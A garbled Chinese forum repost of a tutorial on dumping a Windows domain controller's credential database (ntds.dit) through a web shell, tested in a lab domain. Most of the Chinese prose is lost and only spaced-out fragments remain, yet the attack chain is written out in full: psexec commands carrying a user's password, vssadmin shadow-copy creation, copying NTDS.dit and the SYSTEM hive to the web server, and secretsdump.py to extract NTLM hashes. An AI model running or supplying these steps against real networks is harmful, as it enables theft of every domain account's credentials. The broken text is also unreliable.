搜索

[13771] 2019-02-18_通过Webshell远程导出域控ntds.dit的方法

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2019-02-18_通过Webshell远程导出域控ntds.dit的方法 W e b s h e l l n t d s . d i t s e c i s t   F r e e B u f   2 0 1 9 - 0 2 - 1 8 W i n d o w s   A c t i v e   D i r e c t o r y A D 使 使 W e b   s h e l l W i n d o w s   A c t i v e   D i r e c t o r y W i n d o w s   A c t i v e   D i r e c t o r y   f o r e s t D o m a i n   A d m i n W e b   s h e l l 访 访 R e v e r s e   s h e l l s h e l l A D A D L N T L M I P A D   D o m a i n   A d m i n W e b S h e l l 1 A D q u e e n . D C 1 . i n d i s h e l l . l a b   -   1 9 2 . 1 6 8 . 5 6 . 2 0 0 2 W i n d o w s   -   A D L A B O N E   -   1 9 2 . 1 6 8 . 5 6 . 1 0 1 3 W i n d o w s   A D 使 e x p l o i t 使 M S 1 4 - 0 2 5 W i n d o w s 访 w e b   s h e l l L A B O N E I P 1 9 2 . 1 6 8 . 5 6 . 1 0 1 u s e r 1 i c a _ 1 0 4 6 使 1 p s e x e c . e x e   <   -   W i n d o w s 2 v s s a d m i n   <   -   / W i n d o w s W i n d o w s   A D v s s a d m i n v s s a d m i n C n t d s . d i t S Y S T E M 使 p s e x e c . e x e 使 e l e v a t e d - h I P W i n d o w s w e b   s h e l l W i n d o w s L A B O N E p s e x e c . e x e W e b   s h e l l 使 v s s a d m i n A D I P p s e x e c W i n d o w s   A D v s s a d m i n C n t d s . d i t S Y S T E M W e b   s h e l l 访 W i n d o w s L A B O N E 使 p s e x e c c o p y A D I P 使 S M B n d t s . d i t S Y S T E M L A B O N E p s e x e c 使 p s e x e c r e m o t e _ I P   1 9 2 . 1 6 8 . 5 6 . 2 0 0 q u e e n . D C 1 . i n d i s h e l l . l a b p s e x e c . e x e   r e m o t e _ I P   - u   u s e r _ n a m e   - p   p a s s w o r d _ o f _ t h e _ u s e r   - h   c m d   / c   " c o m m a n d _ w h i c h _ w e _ w a n t _ t o _ e x e c u t e " < b r   / >
u s e r _ n a m e   u s e r 1 p a s s w o r d _ o f _ t h e _ u s e r   i c a _ 1 0 4 6 W i n d o w s L A B O N E w e b   s h e l l 访 p s e x e c C 使 w e b   s h e l l p s e x e c   b i n a r y L A B O N E C : x a m p p h t d o c s b o x p s W e b   s h e l l p s e x e c W i n d o w s   A D C : x a m p p h t d o c s b o x p s o u t . t x t A D 1 9 2 . 1 6 8 . 5 6 . 2 0 0 v s s a d m i n   l i s t   s h a d o w s v s s a d m i n   l i s t   s h a d o w s P s E x e c . e x e     1 9 2 . 1 6 8 . 5 6 . 2 0 0   - u   u s e r 1   - p   i c a _ 1 0 4 6   - h   c m d   / c   " v s s a d m i n   l i s t   s h a d o w s   >   1 9 2 . 1 6 8 . 5 6 . 1 0 1 C $ x a m p p h t d o c s b o x p s o u t . t x t "
o u t . t x t o u t . t x t C n t d s . d i t S Y S T E M c C w e b s h e l l 访 n t d s . d i t S Y S T E M p s e x e c W i n d o w s   A D 1 9 2 . 1 6 8 . 5 6 . 2 0 0 C   L A B O N E   C : x m p p h t d o c s b o x p s o u t . t x t v s s a d m i n   c r e a t e   s h a d o w   / f o r = C : P s E x e c . e x e     1 9 2 . 1 6 8 . 5 6 . 2 0 0   - u   u s e r 1   - p   i c a _ 1 0 4 6   - h   c m d   / c   " v s s a d m i n   c r e a t e   s h a d o w   / f o r = C :   >
o u t . t x t ? G L O B A L R O O T D e v i c e H a r d d i s k V o l u m e S h a d o w C o p y 5 n t d s . d i t S Y S T E M s h a d o w _ c o p y _ v o l u m e _ n a m e W i n d o w s N T D S N T D S . d i t s h a d o w _ c o p y _ v o l u m e _ n a m e W i n d o w s S y s t e m 3 2 c o n f i g S Y S T E M ? G L O B A L R O O T D e v i c e H a r d d i s k V o l u m e S h a d o w C o p y 5 W i n d o w s N T D S N T D S . d i t ? G L O B A L R O O T D e v i c e H a r d d i s k V o l u m e S h a d o w C o p y 5 W i n d o w s S y s t e m 3 2 c o n f i g S Y S T E M 使 W i n d o w s   A D n t d s . d i t n t d s . d i t 1 9 2 . 1 6 8 . 5 6 . 2 0 0 L A B O N E 1 9 2 . 1 6 8 . 5 6 . 1 0 1 C : x a m p p h t d o c s b o x p s P s E x e c . e x e     1 9 2 . 1 6 8 . 5 6 . 2 0 0   - u   u s e r 1   - p   i c a _ 1 0 4 6   - h   c m d   / c   " c o p y     ? G L O B A L R O O T D e v i c e H a r d d i s k V o l u m e S h a d o w C o p y 5 W i n d o w s N T D S N T D S . d i t     1 9 2 . 1 6 8 . 5 6 . 1 0 1 C $ x a m p p h t d o c s b o x p s "
w e b   s h e l l D C C : x a m p p h t d o c s b o x p s n t d s . d i t n t d s . d i t L A B O N E 使 S Y S T E M W e b   s h e l l 1   f i l e   c o p i e d P s E x e c . e x e     1 9 2 . 1 6 8 . 5 6 . 2 0 0   - u   u s e r 1   - p   i c a _ 1 0 4 6   - h   c m d   / c   " c o p y     ? G L O B A L R O O T D e v i c e H a r d d i s k V o l u m e S h a d o w C o p y 5 W i n d o w s S y s t e m 3 2 c o n f i g S Y S T E M
S Y S T E M   L A B O N E 使 w e b   s h e l l 使 p y t h o n s e c r e t s d u m p . p y n t d s . d i t S Y S T E M D o m a i n u d i r i d   L M N T h a s h e s * m a n n u l i n u x F B s e c i s t F r e e B u f . C O M p y t h o n   s e c r e t s d u m p . p y   - n t d s   n t d s . d i t   - s y s t e m   S Y S T E M   L O C A L

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理